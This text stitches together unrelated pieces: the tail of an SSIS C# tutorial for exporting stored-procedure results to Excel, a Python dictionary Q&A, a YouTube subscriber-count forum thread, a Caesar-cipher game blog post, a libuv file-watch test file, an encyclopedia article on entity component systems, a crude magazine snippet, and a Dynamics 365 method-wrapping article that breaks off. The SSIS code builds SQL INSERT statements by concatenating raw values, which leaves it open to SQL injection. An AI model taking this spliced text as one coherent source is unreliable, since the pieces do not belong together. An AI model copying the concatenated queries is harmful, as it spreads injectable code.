    TableColumns = ("[" + TableColumns.Replace(",", " Text,").TrimEnd(','));
    TableColumns = TableColumns.Remove(TableColumns.Length - 2);
    //MessageBox.Show(TableColumns);

    //Use OLE DB Connection and Create Excel Sheet
    Excel_OLE_Con.ConnectionString = connstring;
    Excel_OLE_Con.Open();

    Excel_OLE_Cmd.Connection = Excel_OLE_Con;
    Excel_OLE_Cmd.CommandText = "Create table " + SheetName + " (" + TableColumns + ")";
    Excel_OLE_Cmd.ExecuteNonQuery();

    //Write Data to Excel Sheet from DataTable dynamically
    foreach (DataTable table in ds.Tables)
    {
        String sqlCommandInsert = "";
        String sqlCommandValue = "";
        foreach (DataColumn dataColumn in table.Columns)
        {
            sqlCommandValue += dataColumn + "],[";
        }

        sqlCommandValue = "[" + sqlCommandValue.TrimEnd(',');
        sqlCommandValue = sqlCommandValue.Remove(sqlCommandValue.Length - 2);
        sqlCommandInsert = "INSERT into " + SheetName + "(" + sqlCommandValue + ") VALUES(";

        int columnCount = table.Columns.Count;
        foreach (DataRow row in table.Rows)
        {
            string columnvalues = "";
            for (int i = 0; i < columnCount; i++)
            {
                int index = table.Rows.IndexOf(row);
                columnvalues += "'" + table.Rows[index].ItemArray[i] + "',";
            }
            columnvalues = columnvalues.TrimEnd(',');
            var command = sqlCommandInsert + columnvalues + ")";
            Excel_OLE_Cmd.CommandText = command;
            Excel_OLE_Cmd.ExecuteNonQuery();
        }
    }
    Excel_OLE_Con.Close();
    Dts.TaskResult = (int)ScriptResults.Success;
}
catch (Exception exception)
{
    // Create Log File for Errors
    using (StreamWriter sw = File.CreateText(Dts.Variables["User::FolderPath"].Value.ToString()
        + "\\" + Dts.Variables["User::ExcelFileName"].Value.ToString() + datetime + ".log"))
    {
        sw.WriteLine(exception.ToString());
        Dts.TaskResult = (int)ScriptResults.Failure;
    }
}

Step 5: Save the script in Script Task Editor and close the window.
Run your SSIS Package. In the Script Task, it is going to execute the Stored Procedure and then dump the results returned by the Stored Procedure to the Excel file. I executed my SSIS Package a couple of times and it generated Excel files as shown below.

(Figure: How to load Stored Procedure results to Excel file dynamically in SSIS Package by using Script Task - C# scripting language)

Check out our other posts/videos for dynamic Excel sources and destinations:

1. How to Load Data from Excel Files when Number of Columns can decrease or order is changed in Excel Sheet
2. How to Load Only Matching Column Data to SQL Server Table from Multiple Excel Files (Single Sheet per file) Dynamically in SSIS Package
3. How to Load Excel File Names with Sheet Names, Row Count, Last Modified Date, File Size in SQL Server Table
4. How to Load Multiple Excel Files with Multiple Sheets to Single SQL Server Table by using SSIS Package
5. How to Load Matching Sheets from Excel to Table and Log Not Matching Sheets Information in SQL Server Table
6. How to create Table for each sheet in Excel Files and load data to it dynamically in SSIS Package
7. How to Create Table per Excel File and Load all Sheets Data Dynamically in SSIS Package by using Script Task
8. How to create CSV file per Excel File and Load All Sheets from Excel File to it in SSIS Package
9. How to Create CSV File for Each Excel Sheet from Excel Files in SSIS Package
10. How to Load Excel File Name and Sheet Name with Data to SQL Server in SSIS Package
11. How to Import data from Multiple Excel Sheets with a pattern of sheet names from Multiple Excel File in SSIS Package
12. How to import Data from Excel Files for specific Sheet Name to SQL Server Table in SSIS Package
13. Load Data To Tables according to Excel Sheet Names from Excel Files dynamically in SSIS Package
14. How to Load Excel Files with Single/Multiple Sheets to SQL Server Tables according to Excel File Name Dynamically
15. How to Read Excel Sheet Data after Skipping Rows in SSIS Package by using Script Task
16. How to read data from Excel Sheet and Load to Multiple Tables by using Script Task in SSIS Package
17. How to create Excel File Dynamically from SQL server Table/View by using Script Task in SSIS Package
18. How to create Excel File Dynamically for Stored Procedure Results in SSIS Package by using Script Task
19. How to Export SQL Server Tables from Database to Excel File Dynamically in SSIS Package by using Script Task
20. How to Convert CSV/Text Files to Excel Files in SSIS Package by using Script Task
21. How to Load All CSV Files to Excel Sheets (Sheet Per CSV) in single Excel File in SSIS Package
22. How to Load All CSV Files to Single Excel Sheet with File Names in an Excel File Dynamically in SSIS Package
23. How to Create Sample Excel file with Sheet from each table with Top 1000 Rows per sheet in SSIS Package
24. How to Export Data to Multiple Excel Sheets from Single SQL Server Table in SSIS Package
Teacher Stats (Python > Python Collections > Dictionaries)

Question (Siddharth Pande): no clue on how to solve this one

teachers.py

# The dictionary will look something like:
# {'Andrew Chalkley': ['jQuery Basics', 'Node.js Basics'],
#  'Kenneth Love': ['Python Basics', 'Python Collections']}
#
# Each key will be a Teacher and the value will be a list of courses.
#
# Your code goes below here.
def num_teachers(tree_dict):
    intr = len(tree_dict)
    return intr

def num_courses(tree_dict):
    values = list(tree_dict.values())
    count = 0
    for item in values:
        for i in item:
            count += 1
    return count

def courses(tree_dict):
    final_list = []
    values = tree_dict.values()
    for item in values:
        for i in item:
            print(i)
            final_list.append(i)
    return final_list

def most_courses(tree_dict):

2 Answers

Answer 1:
Try having a count set to 0, and a blank string to represent the teacher name. Using "for key, values..." and looping through the dict using the items() method, you can compare the length of the values (courses) to the current count. If it is higher than the current count, assign the key (teacher) to the name string and return that string.

Answer 2 (Steven Parker):
Since you previously returned the count of courses in "num_courses", one approach would be to loop through the items as you did before, but this time keep track of the highest count and the teacher associated with it. Then, when the loop ends, you could return the teacher's name associated with the highest count.
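Putting the answers' outline into code, a sketch of the missing function might look like this (the dictionary argument name is the student's; the rest is illustrative):

def most_courses(tree_dict):
    # Track the longest course list seen so far and its teacher.
    max_count = 0
    busiest_teacher = ""
    for teacher, course_list in tree_dict.items():
        if len(course_list) > max_count:
            max_count = len(course_list)
            busiest_teacher = teacher
    return busiest_teacher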
How does the subscriber count work??

Discussion in 'YouTube Chat, Gossip & Help' started by GeekCheese, Jul 17, 2017.

GeekCheese:
I've noticed something weird. It's almost like the subscriber number changes hours later, or even a day later after the person actually subbed. Or it's the other way and the sub number goes up before the name gets added to the list. Like, it just went up to 9 tonight, but nobody was added to the named list of subs. But I have a feeling tomorrow a new name will appear. Does it just take awhile to update? Then the other day, we went up to 8, but it kept going up and down to 7 then 8 then 7 then 8. Then I woke up and we were at 8 and a new person was on the list of subs. It would change every time I looked. Does this kinda stuff happen to other people?

S_Mielz:
Well, for one, if the subscriber doesn't have their subscriptions public you won't be able to see it on the list. Also I think there is a bit of a delay.

AuthenticFINN:
When someone subscribes to me, I usually see the number change in the account selection thing first (at the top right of the youtube page) before I see it on my channel, so idk.

GeekCheese:
Does it update overnight? I feel like it doesn't change until I check it in the morning.

Courtney Candice:
When someone subscribes to me I don't usually see it right away unless I click on the list of subscribers. It usually takes a few minutes, sometimes a few hours. And when you search for my channel, before you click on my channel name it tells you how many subscribers and videos I have, but that's usually wrong and doesn't update for a few days!

GeekCheese:
Yeah, I noticed something similar.
CipherSeeker Python Game: Navigating the Digital Shadows with Python

Hey fam! It's been a wild week, and I've got something super dope to share. You know how I've always been fascinated by mysteries, right? Well, this week, I dove head-first into the world of digital espionage with "CipherSeeker". Let me tell y'all, it's been one heck of a ride!

The Allure of Encryption

Ever wondered what it feels like to be a digital spy? To intercept secret messages and crack them wide open? Man, the thrill is unreal! With Python by my side, I felt like James Bond in the cyber world. And guess what? My buddy Jay tried it too, and he was blown away!

The Heart of CipherSeeker

Here's the deal – the game's all about encrypted messages. You get these coded texts and gotta decipher them. Sounds simple, right? Ha! Think again. It's challenging, but oh-so-rewarding when you crack that code. The adrenaline rush? Insane!

Python – The Unsung Hero

Python makes this game what it is. It's the backbone, the unsung hero. For someone like me, who eats, sleeps, and breathes Python at the coding camp, it's like a dream come true. And the best part? Even if you're not a pro, you can still dive in and have a blast. Trust me, I've seen it!

A Walk Down Memory Lane

Funny story – I remember when my sis, Emma, tried her hand at "CipherSeeker". She's more of an artsy type, but the joy on her face when she deciphered her first message? Priceless! Just goes to show, there's a bit of a codebreaker in all of us.

The Codebreaking Journey in Code

import random
import string

class CipherSeeker:
    def __init__(self):
        # Each message is stored with the shift that was used to encrypt it.
        self.messages = [
            ("YMJ HTIJ!", 5),
            ("ZNK VGIQ!", 6),
            ("BPM SMG!", 8)
        ]
        self.current_msg, self.shift = random.choice(self.messages)

    def decrypt(self, message, shift):
        decrypted = ''
        for char in message:
            if char in string.ascii_uppercase:
                decrypted += chr((ord(char) - shift - 65) % 26 + 65)
            else:
                decrypted += char
        return decrypted

    def play(self):
        print("You've intercepted an encrypted message!")
        print(f"Encrypted Message: {self.current_msg}")
        attempts = 3
        while attempts:
            guess_shift = int(input("Enter the shift value to decrypt (0-25): "))
            deciphered = self.decrypt(self.current_msg, guess_shift)
            if guess_shift == self.shift:
                print(f"Decrypted Message: {deciphered}")
                print("Great job, agent! You've successfully decrypted the message.")
                return
            else:
                print(f"Wrong shift value. Deciphered as: {deciphered}")
                attempts -= 1
                print(f"You have {attempts} attempts left.")
        print("Sorry, agent. The correct message remains hidden.")

game = CipherSeeker()
game.play()

Delving into the World of Espionage

• Encrypted Messages: The heart of our digital spy game lies in the intercepted messages. Each one is a riddle, encrypted using the Caesar Cipher, waiting to be cracked.
• The Art of Decryption: The decrypt function is the essence of our codebreaking. It uses the Caesar Cipher to decrypt messages based on the shift provided by the player.
• The Espionage Adventure: The play function is where the magic happens. With limited attempts, you must decipher the message, unveil its secrets, and successfully complete your mission.

Expected Digital Reconnaissance

Your digital espionage might look something like:

You've intercepted an encrypted message!
Encrypted Message: YMJ HTIJ!
Enter the shift value to decrypt (0-25): 4
Wrong shift value. Deciphered as: UIF DPEF!
You have 2 attempts left.
Enter the shift value to decrypt (0-25): 5
Decrypted Message: THE CODE!
Great job, agent! You've successfully decrypted the message.

Each session of "CipherSeeker" challenges your analytical skills, thrusting you into the thrilling world of digital espionage and intrigue.

The Undercover World of CipherSeeker

Dive into the realm of "CipherSeeker", where every line of code takes you deeper into the heart of a digital spy thriller. It's not just about algorithms and shifts; it's about intuition, strategy, and the thrill of the chase.

Tales from the Shadows

I recall an evening when my friend Adrian and I dived into "CipherSeeker". Inspired by the experience, Adrian introduced a more complex encryption system, adding layers of depth and intrigue. The digital shadows had never seemed so alive!

Final Thoughts

Overall, "CipherSeeker" is more than just a game. It's an experience, a journey into the heart of digital mysteries. If you're into codes, ciphers, or just looking for a rad time, you gotta check it out!

Thanks for tuning in, folks! If you loved this, don't forget to smash that like button and subscribe for more Python adventures. Until next time, keep those codes coming and stay legendary!

Random Fact: Did you know that the Caesar Cipher, used in "CipherSeeker", is one of the oldest known encryption techniques? It's named after Julius Caesar, who reportedly used it in his private correspondence. The more you know!
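One thing the post doesn't show is how the intercepted messages get made in the first place. Here's a tiny companion sketch (my own addition, assuming the same uppercase-only alphabet handling as the game's decrypt function):

import string

def encrypt(message, shift):
    # Mirror of CipherSeeker's decrypt: shift uppercase letters forward.
    encrypted = ''
    for char in message:
        if char in string.ascii_uppercase:
            encrypted += chr((ord(char) + shift - 65) % 26 + 65)
        else:
            encrypted += char
    return encrypted

print(encrypt("THE CODE!", 5))   # -> YMJ HTIJ!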
/* Copyright Joyent, Inc. and other Node contributors. All rights reserved.
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to
 * deal in the Software without restriction, including without limitation the
 * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
 * sell copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
 * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
 * IN THE SOFTWARE.
 */

#include "uv.h"
#include "task.h"

#include <string.h>
#include <fcntl.h>

static uv_fs_event_t fs_event;
static uv_timer_t timer;
static int timer_cb_called;
static int close_cb_called;
static int fs_event_cb_called;
static int timer_cb_touch_called;

static void create_dir(uv_loop_t* loop, const char* name) {
  int r;
  uv_fs_t req;
  r = uv_fs_mkdir(loop, &req, name, 0755, NULL);
  ASSERT(r == 0);
  uv_fs_req_cleanup(&req);
}

static void create_file(uv_loop_t* loop, const char* name) {
  int r;
  uv_file file;
  uv_fs_t req;

  r = uv_fs_open(loop, &req, name, O_WRONLY | O_CREAT,
      S_IWRITE | S_IREAD, NULL);
  ASSERT(r != -1);
  file = r;
  uv_fs_req_cleanup(&req);
  r = uv_fs_close(loop, &req, file, NULL);
  ASSERT(r == 0);
  uv_fs_req_cleanup(&req);
}

static void touch_file(uv_loop_t* loop, const char* name) {
  int r;
  uv_file file;
  uv_fs_t req;

  r = uv_fs_open(loop, &req, name, O_RDWR, 0, NULL);
  ASSERT(r != -1);
  file = r;
  uv_fs_req_cleanup(&req);

  r = uv_fs_write(loop, &req, file, "foo", 4, -1, NULL);
  ASSERT(r != -1);
  uv_fs_req_cleanup(&req);

  r = uv_fs_close(loop, &req, file, NULL);
  ASSERT(r != -1);
  uv_fs_req_cleanup(&req);
}

static void close_cb(uv_handle_t* handle) {
  ASSERT(handle != NULL);
  close_cb_called++;
}

static void fs_event_cb_dir(uv_fs_event_t* handle, const char* filename,
    int events, int status) {
  ++fs_event_cb_called;
  ASSERT(handle == &fs_event);
  ASSERT(status == 0);
  ASSERT(events == UV_RENAME);
  ASSERT(filename == NULL || strcmp(filename, "file1") == 0);
  uv_close((uv_handle_t*)handle, close_cb);
}

static void fs_event_cb_file(uv_fs_event_t* handle, const char* filename,
    int events, int status) {
  ++fs_event_cb_called;
  ASSERT(handle == &fs_event);
  ASSERT(status == 0);
  ASSERT(events == UV_CHANGE);
  ASSERT(filename == NULL || strcmp(filename, "file2") == 0);
  uv_close((uv_handle_t*)handle, close_cb);
}

static void fs_event_cb_file_current_dir(uv_fs_event_t* handle,
    const char* filename, int events, int status) {
  ++fs_event_cb_called;
  ASSERT(handle == &fs_event);
  ASSERT(status == 0);
  ASSERT(events == UV_CHANGE);
  ASSERT(filename == NULL || strcmp(filename, "watch_file") == 0);
  uv_close((uv_handle_t*)handle, close_cb);
}

static void timer_cb_dir(uv_timer_t* handle, int status) {
  ++timer_cb_called;
  create_file(handle->loop, "watch_dir/file1");
  uv_close((uv_handle_t*)handle, close_cb);
}

static void timer_cb_file(uv_timer_t* handle, int status) {
  ++timer_cb_called;

  if (timer_cb_called == 1) {
    touch_file(handle->loop, "watch_dir/file1");
  } else {
    touch_file(handle->loop, "watch_dir/file2");
    uv_close((uv_handle_t*)handle, close_cb);
  }
}

static void timer_cb_touch(uv_timer_t* timer, int status) {
  ASSERT(status == 0);
  uv_close((uv_handle_t*)timer, NULL);
  touch_file(timer->loop, "watch_file");
  timer_cb_touch_called++;
}

TEST_IMPL(fs_event_watch_dir) {
  uv_fs_t fs_req;
  uv_loop_t* loop = uv_default_loop();
  int r;

  /* Setup */
  uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL);
  uv_fs_unlink(loop, &fs_req, "watch_dir/file2", NULL);
  uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL);
  create_dir(loop, "watch_dir");

  r = uv_fs_event_init(loop, &fs_event, "watch_dir", fs_event_cb_dir, 0);
  ASSERT(r != -1);
  r = uv_timer_init(loop, &timer);
  ASSERT(r != -1);
  r = uv_timer_start(&timer, timer_cb_dir, 100, 0);
  ASSERT(r != -1);

  uv_run(loop);

  ASSERT(fs_event_cb_called == 1);
  ASSERT(timer_cb_called == 1);
  ASSERT(close_cb_called == 2);

  /* Cleanup */
  r = uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL);
  r = uv_fs_unlink(loop, &fs_req, "watch_dir/file2", NULL);
  r = uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL);

  return 0;
}

TEST_IMPL(fs_event_watch_file) {
  uv_fs_t fs_req;
  uv_loop_t* loop = uv_default_loop();
  int r;

  /* Setup */
  uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL);
  uv_fs_unlink(loop, &fs_req, "watch_dir/file2", NULL);
  uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL);
  create_dir(loop, "watch_dir");
  create_file(loop, "watch_dir/file1");
  create_file(loop, "watch_dir/file2");

  r = uv_fs_event_init(loop, &fs_event, "watch_dir/file2", fs_event_cb_file, 0);
  ASSERT(r != -1);
  r = uv_timer_init(loop, &timer);
  ASSERT(r != -1);
  r = uv_timer_start(&timer, timer_cb_file, 100, 100);
  ASSERT(r != -1);

  uv_run(loop);

  ASSERT(fs_event_cb_called == 1);
  ASSERT(timer_cb_called == 2);
  ASSERT(close_cb_called == 2);

  /* Cleanup */
  r = uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL);
  r = uv_fs_unlink(loop, &fs_req, "watch_dir/file2", NULL);
  r = uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL);

  return 0;
}

TEST_IMPL(fs_event_watch_file_current_dir) {
  uv_timer_t timer;
  uv_loop_t* loop;
  uv_fs_t fs_req;
  int r;

  loop = uv_default_loop();

  /* Setup */
  uv_fs_unlink(loop, &fs_req, "watch_file", NULL);
  create_file(loop, "watch_file");

  r = uv_fs_event_init(loop, &fs_event, "watch_file",
      fs_event_cb_file_current_dir, 0);
  ASSERT(r != -1);

  r = uv_timer_init(loop, &timer);
  ASSERT(r == 0);

  r = uv_timer_start(&timer, timer_cb_touch, 1, 0);
  ASSERT(r == 0);

  ASSERT(timer_cb_touch_called == 0);
  ASSERT(fs_event_cb_called == 0);
  ASSERT(close_cb_called == 0);

  uv_run(loop);

  ASSERT(timer_cb_touch_called == 1);
  ASSERT(fs_event_cb_called == 1);
  ASSERT(close_cb_called == 1);

  /* Cleanup */
  r = uv_fs_unlink(loop, &fs_req, "watch_file", NULL);

  return 0;
}

TEST_IMPL(fs_event_no_callback_on_close) {
  uv_fs_t fs_req;
  uv_loop_t* loop = uv_default_loop();
  int r;

  /* Setup */
  uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL);
  uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL);
  create_dir(loop, "watch_dir");
  create_file(loop, "watch_dir/file1");

  r = uv_fs_event_init(loop, &fs_event, "watch_dir/file1", fs_event_cb_file, 0);
  ASSERT(r != -1);

  uv_close((uv_handle_t*)&fs_event, close_cb);

  uv_run(loop);

  ASSERT(fs_event_cb_called == 0);
  ASSERT(close_cb_called == 1);

  /* Cleanup */
  r = uv_fs_unlink(loop, &fs_req, "watch_dir/file1", NULL);
  r = uv_fs_rmdir(loop, &fs_req, "watch_dir", NULL);

  return 0;
}

static void fs_event_fail(uv_fs_event_t* handle, const char* filename,
    int events, int status) {
  ASSERT(0 && "should never be called");
}

static void timer_cb(uv_timer_t* handle, int status) {
  int r;

  ASSERT(status == 0);

  r = uv_fs_event_init(handle->loop, &fs_event, ".", fs_event_fail, 0);
  ASSERT(r == 0);

  uv_close((uv_handle_t*)&fs_event, close_cb);
  uv_close((uv_handle_t*)handle, close_cb);
}

TEST_IMPL(fs_event_immediate_close) {
  uv_timer_t timer;
  uv_loop_t* loop;
  int r;

  loop = uv_default_loop();

  r = uv_timer_init(loop, &timer);
  ASSERT(r == 0);

  r = uv_timer_start(&timer, timer_cb, 1, 0);
  ASSERT(r == 0);

  uv_run(loop);

  ASSERT(close_cb_called == 2);

  return 0;
}
Entity component system

Entity Component System (ECS) is a software architectural pattern mostly used in video game development for the representation of game world objects. An ECS comprises entities composed from components of data, with systems which operate on entities' components.

ECS follows the principle of composition over inheritance, meaning that every entity is defined not by a type hierarchy, but by the components that are associated with it. Systems act globally over all entities which have the required components.

Characteristics

Entity: An entity represents a general-purpose object. In a game engine context, for example, every coarse game object is represented as an entity. Usually, it only consists of a unique id. Implementations typically use a plain integer for this.[1]

Component: A component labels an entity as possessing a particular aspect, and holds the data needed to model that aspect. For example, every game object that can take damage might have a Health component associated with its entity. Implementations typically use structs, classes, or associative arrays.[1]

System: A system is a process which acts on all entities with the desired components. For example, a physics system may query for entities having mass, velocity and position components, and iterate over the results doing physics calculations on the sets of components for each entity.

The behavior of an entity can be changed at runtime by systems that add, remove or modify components. This eliminates the ambiguity problems of deep and wide inheritance hierarchies often found in Object Oriented Programming techniques that are difficult to understand, maintain, and extend. Common ECS approaches are highly compatible with, and are often combined with, data-oriented design techniques. Data for all instances of a component are commonly stored together in physical memory, enabling efficient memory access for systems which operate over many entities.

History

In 2007, the team working on Operation Flashpoint: Dragon Rising experimented with ECS designs, including those inspired by Bilas/Dungeon Siege, and Adam Martin later wrote a detailed account of ECS design,[2] including definitions of core terminology and concepts.[3] In particular, Martin's work popularized the ideas of systems as a first-class element, entities as identifiers, components as raw data, and code stored in systems, not in components or entities.

In 2015, Apple Inc. introduced GameplayKit, an API framework for iOS, macOS and tvOS game development that includes an implementation of ECS.[4]

In August 2018 Sander Mertens created the popular flecs ECS framework.[5]

In October 2018[6] the company Unity released its megacity demo that utilized a tech stack built on an ECS. It had 100,000 audio sources—one for every car, neon sign, and more—creating a large, complex soundscape.[6]

Variations

The data layout of different ECSs can differ, as can the definition of components, how they relate to entities, and how systems access entities' components.

Martin's ECS

A popular blog series by Adam Martin defines what he considers an Entity Component System:[3]

An entity only consists of an ID for accessing components. It is a common practice to use a unique ID for each entity. This is not a requirement, but it has several advantages:

• The entity can be referred to using the ID instead of a pointer. This is more robust, as it would allow for the entity to be destroyed without leaving dangling pointers.
• It helps for saving state externally. When the state is loaded again, there is no need for pointers to be reconstructed.
• Data can be shuffled around in memory as needed.
• Entity ids can be used when communicating over a network to uniquely identify the entity.

Some of these advantages can also be achieved using smart pointers.

Components have no game code (behavior) inside of them. The components don't have to be located physically together with the entity, but should be easy to find and access using the entity.

"Each System runs continuously (as though each System had its own private thread) and performs global actions on every Entity that possesses a Component or Components that match that System's query."

The Unity game engine

Unity's layout has tables, each with columns of components. In this system an entity type is based on the components it holds. For every entity type there is a table (called an archetype) holding columns of components that match the components used in the entity. To access a particular entity one must find the correct archetype (table) and index into each column to get each corresponding component for that entity.

Apparatus ECS

Apparatus is a third-party ECS implementation for Unreal Engine that has introduced some additional features to the common ECS paradigm. One of those features is the support of a type hierarchy for the components. Each component can have a base component type (or a base class), much like in OOP. A system can then query with the base class and get all of its descendants matched in the resulting entities selection. This can be very useful for some common logic to be implemented on a set of different components, and adds an additional dimension to the paradigm.

FLECS

Flecs is a fast and lightweight Entity Component System (ECS) for C & C++ that lets you build games and simulations with millions of entities.

Common patterns in ECS use

The normal way to transmit data between systems is to store the data in components, and then have each system access the component sequentially. For example, the position of an object can be updated regularly. This position is then used by other systems.

If there are a lot of different infrequent events, a lot of flags will be needed in one or more components. Systems will then have to monitor these flags every iteration, which can become inefficient. A solution could be to use the observer pattern: all systems that depend on an event subscribe to it. The action from the event will thus only be executed once, when it happens, and no polling is needed.

The ECS architecture has no trouble with the dependency problems commonly found in Object Oriented Programming, since components are simple data buckets with no dependencies. Each system will typically query the set of components an entity must have for the system to operate on it. For example, a render system might register the model, transform, and drawable components. When it runs, the system will perform its logic on any entity that has all of those components. Other entities are simply skipped, with no need for complex dependency trees. However, this can be a place for bugs to hide, since propagating values from one system to another through components may be hard to debug. ECS may be used where uncoupled data needs to be bound to a given lifetime.

The ECS architecture uses composition, rather than inheritance trees. An entity will typically be made up of an ID and a list of components that are attached to it.
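As a rough, hypothetical illustration (a Python sketch written for this article, not taken from any of the cited frameworks), the composition-based approach can be summarized as follows:

from dataclasses import dataclass

@dataclass
class Position:
    x: float
    y: float

@dataclass
class Velocity:
    dx: float
    dy: float

class World:
    def __init__(self):
        self.next_id = 0
        self.components = {}   # component type -> {entity id -> instance}

    def create_entity(self, *components):
        # An entity is just a unique integer id.
        entity = self.next_id
        self.next_id += 1
        for component in components:
            self.components.setdefault(type(component), {})[entity] = component
        return entity

    def query(self, *types):
        # Yield (entity, components...) for entities having all requested types.
        stores = [self.components.get(t, {}) for t in types]
        for entity in set.intersection(*(set(s) for s in stores)):
            yield (entity, *(s[entity] for s in stores))

def movement_system(world, dt):
    # Acts globally on every entity with Position and Velocity components.
    for _, pos, vel in world.query(Position, Velocity):
        pos.x += vel.dx * dt
        pos.y += vel.dy * dt

world = World()
world.create_entity(Position(0.0, 0.0), Velocity(1.0, 2.0))
world.create_entity(Position(5.0, 5.0))   # no Velocity: skipped by the system
movement_system(world, dt=0.016)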
Any game object can be created by adding the correct components to an entity. This allows the developer to easily add features of one object to another, without any dependency issues. For example, a player entity could have a bullet component added to it, and then it would meet the requirements to be manipulated by some bulletHandler system, which could result in that player doing damage to things by running into them.

The merits of using ECSs for storing the game state have been proclaimed by many game developers like Adam Martin. A good example is the series of blog posts by Richard Lord, where he discusses the merits of ECS-designed game data storage systems and why they are so useful.[7]

Debate

Is "system" first class?

This article defines ECS as a software architecture pattern with three first-class parts: entities, components, and systems. Due to an ambiguity in the English language, however, a common interpretation of the name is that an ECS is a system comprising entities and components. For example, in the 2013 talk at GDC,[8] Scott Bilas compares a C++ object system and his new custom component system. This is consistent with a traditional use of the system term in general systems engineering, with Common Lisp Object System and type system as examples.

Therefore, the idea of "Systems" as first-class elements is a contestable one. The practical difference in such an entity-component architecture is that behaviors will be defined on the components and/or entities. This will have trade-offs, making it more or less suitable depending on the application. To avoid ambiguity in this article, we follow the words "Entity Component System" with a noun such as "framework" or "architecture". The word "system" is singular in this context.

Is ECS a useful concept?

ECS combines orthogonal, well-established ideas in general computer science and programming language theory. For example, components can be seen as a mixin idiom in various programming languages. Components are a specialized case under the general delegation (object-oriented programming) approach and meta-object protocol. That is, any complete component object system can be expressed with the templates and empathy model within The Orlando Treaty[9] vision of object-oriented programming.

But whatever the theoretical utility of the concept is, the widespread use of Entity Component System frameworks, particularly in games programming, makes its practical utility indisputable.

References

1. "Entity Systems Wiki". Archived from the original on 31 December 2019. Retrieved 31 December 2019.
2. Martin, Adam. "Entity Systems are the Future of MMOG Development". Archived from the original on 26 December 2013. Retrieved 25 December 2013.
3. Martin, Adam. "Entity Systems are the Future of MMOG Development Part 2". Archived from the original on 26 December 2013. Retrieved 25 December 2013.
4. "Introducing GameplayKit - WWDC 2015 - Videos". Archived from the original on 2017-10-06. Retrieved 2017-10-06.
5. "SanderMertens - Overview". GitHub. Retrieved 2021-09-06.
6. "Unity unleashes Megacity demo - millions of objects in a huge cyberpunk world". MCV/DEVELOP. 2018-10-24. Retrieved 2021-06-24.
7. "Why use an Entity Component System architecture for game development?". www.richardlord.net. Retrieved 2021-11-18.
8. Bilas, Scott. "A Data-Driven Game Object System" (PDF). Archived (PDF) from the original on 18 September 2013. Retrieved 25 December 2013.
9. Lynn Andrea Stein, Henry Liberman, David Ungar: A shared view of sharing: The Treaty of Orlando. In: Won Kim, Frederick H. Lochovsky (Eds.): Object-Oriented Concepts, Databases, and Applications. ACM Press, New York 1989, ch. 3, pp. 31–48. ISBN 0-201-14410-7 (online, archived 2016-10-07 at the Wayback Machine)
Personal Computing

by Tyrone Shulaises

THE Apollo-era Saturn V rocket operated with less raw computing power than the average desktop calculator. Thirty years later, the average American has, upon his own desktop, equipment sophisticated enough to calculate the telemetry of an ICBM missile operating at well over Mach 5 over its 9 to 12 thousand mile track. With so much power at your disposal, you must have the chubby to end all chubbies.
Class extension via method wrapping and Chain of Command (CoC)

Song Nghia - Technical Consultant

The functionality for class extension, or class augmentation, has been improved in Microsoft Dynamics 365 for Finance and Operations. You can now wrap logic around methods that are defined in the base class that you're augmenting. You can extend the logic of public and protected methods without having to use event handlers. When you wrap a method, you can also access public and protected methods, and variables of the base class. In this way, you can start transactions and easily manage state variables that are associated with your class.

For example, a model contains the following code.

class BusinessLogic1
{
    str DoSomething(int arg)
    {
    }
}

You can now augment the functionality of the DoSomething method inside an extension class by reusing the same method name. An extension class must belong to a package that references the model where the augmented class is defined.

[ExtensionOf(ClassStr(BusinessLogic1))]
final class BusinessLogic1_Extension
{
    str DoSomething(int arg)
    {
        // Part 1
        var s = next DoSomething(arg + 4);
        // Part 2
        return s;
    }
}

In this example, the wrapper around DoSomething and the required use of the next keyword create a Chain of Command (CoC) for the method. CoC is a design pattern where a request is handled by a series of receivers. The pattern supports loose coupling of the sender and the receivers.

We now run the following code.

BusinessLogic1 c = new BusinessLogic1();
info(c.DoSomething(33));

When this code is run, the system finds any method that wraps the DoSomething method. The system randomly runs one of these methods, such as the DoSomething method of the BusinessLogic1_Extension class. When the call to the next DoSomething method occurs, the system randomly picks another method in the CoC. If no more wrapped methods exist, the system calls the original implementation.

Supported versions

Important: The functionality that is described in this topic (CoC and access to protected methods and variables) is available in Platform update 9. However, the class that is being augmented must also be compiled on Platform update 9 or later. As of August 2017, all current releases of the applications for Finance and Operations have been compiled on Platform update 8 or earlier. Therefore, to wrap a method that is defined in a base package (such as Application Suite), you must recompile that base package on Platform update 9 or later.

As an example: if you create your own extension model that is augmenting a class that exists in the Application Suite model, and if you are using CoC or accessing protected methods/variables, you will need to build both Application Suite and your extension model. You will also need to create a deployable package that includes both models in order to deploy this functionality on a runtime environment. This is a temporary situation until the next release of the Dynamics 365 for Finance and Operations application.

Capabilities

The following sections give more details about the capabilities of method wrapping and CoC.

Wrapping public and protected methods

Protected or public methods of classes, tables, or forms can be wrapped by using an extension class that augments that class, table, or form. The wrapper method must have the same signature as the base method.

- When you augment form classes, only root-level methods can be wrapped. You can't wrap methods that are defined in nested classes.
- Only methods that are defined in regular classes can be wrapped. Methods that are defined in extension classes can't be wrapped by augmenting the extension classes.

What about default parameters?

